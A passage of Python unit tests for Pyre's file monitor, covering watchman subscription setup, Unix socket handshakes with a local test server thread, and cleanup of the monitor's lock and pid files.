configuration.extensions = ["thrift", "whl"]
monitor = Monitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
],
)
# no watchman root -> terminate
find_root.return_value = None
self.assertRaises(
MonitorException, Monitor, arguments, configuration, analysis_directory
)
def test_bad_socket(self):
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
self.assertRaises(
MonitorException, Monitor._connect_to_socket, bad_socket_path
)
@patch.object(Monitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path):
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
write_message(
outfile,
LanguageServerProtocolMessage(
method="handshake/server", parameters={"version": "123"}
),
)
response = read_message(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
updated_message = read_message(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
analysis_directory.process_updated_files.side_effect = lambda files: UpdatedPaths(
updated=[file.replace("ROOT", "ANALYSIS") for file in files],
invalidated=[],
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = Monitor(arguments, configuration, analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(Monitor, "_watchman_client")
@patch.object(Monitor, "_connect_to_socket")
@patch.object(Monitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_connect_to_socket,
_watchman_client,
perform_handshake,
):
with tempfile.TemporaryDirectory() as root:
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = Monitor(arguments, configuration, analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(root, ".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath):
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
"long_name" * 15, ".pyre", "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
Monitor._connect_to_socket(socket_link)
server_thread.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.